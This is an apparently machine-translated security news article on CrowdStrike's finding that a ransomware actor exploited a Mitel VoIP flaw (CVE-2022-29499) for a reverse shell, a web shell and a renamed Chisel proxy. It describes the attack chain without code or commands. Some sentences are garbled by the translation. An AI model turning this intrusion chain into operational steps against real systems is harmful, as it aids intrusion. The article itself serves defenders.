A suspected ransomware intrusion on an undisclosed target used a Mitel VoIP device as an access point to execute code remotely and gain initial access to the environment.
The findings coming from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device located on the network perimeter, while also identifying a previously unknown exploit, as well as a number of anti-forensic measures deployed by the actor on the network. device to erase traces of their actions.
The exploit in question is followed if: CVE-2022-29499 and was repaired by Mitel in April 2022. It has a score of 9.8 out of 10 for the severity of the CVSS vulnerability scoring system, making it a critical shortcoming.
“A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) that could allow a malicious actor to execute remote code (CVE-2022-29499) within the context of the Service Appliance,” the company noted in an opinion.
The exploit involved two HTTP GET requests — used to retrieve a specific resource from a server — to trigger remote code execution by retrieving fraudulent commands from the attacker’s controlled infrastructure.
In the incident investigated by CrowdStrike, the attacker allegedly used the exploit to create a reverse shell and use it to launch a web shell (“pdf_import.php”) on the VoIP device and download the open source . Chisel proxy tool.
The binary was then executed, but only after it was renamed to “memdump” in an effort to fly under the radar and use the utility as a “reverse proxy to run the threat actor further into the environment via the VOIP device.” But the subsequent detection of the activity halted their progress and prevented that from happening. they could move laterally across the network.
The disclosure comes less than two weeks after German penetration testing company SySS revealed two flaws in Mitel 6800/6900 desk phones (CVE-2022-29854 and CVE-2022-29855) that, if successfully exploited, could allow an attacker to to obtain root rights on the devices.
“Timely patching is critical to protecting perimeter equipment. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant,” said CrowdStrike researcher Patrick Bennett.
“Critical assets should be isolated from perimeter devices as much as possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via ‘one hop’ from the compromised device.”